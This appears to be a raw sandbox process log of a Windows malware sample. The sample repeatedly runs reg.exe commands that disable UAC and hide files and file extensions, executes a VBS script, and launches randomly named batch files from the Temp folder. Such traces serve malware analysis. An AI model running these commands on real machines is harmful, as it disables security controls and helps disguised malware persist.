reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NiAMoIMU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qSooMkUB.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GYMwkEgk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yiYccQMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QSAUggIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZQYEsoQE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RawckskI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGccIIwk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEcEAowU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IcMEokIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AwAocssQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vqwoMsgk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bkcoUMIo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rEIUEkMQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gSkkgsIo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cyAoMMgc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HqkwsEss.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIwIcgYA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bUEsYsII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hqQQUccU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jyYQIAEw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwEMoQgY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ScccoAYM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gOcYsUQo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OEsIowso.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IGgUEUwQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\omMQMEEc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgkEwYYc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

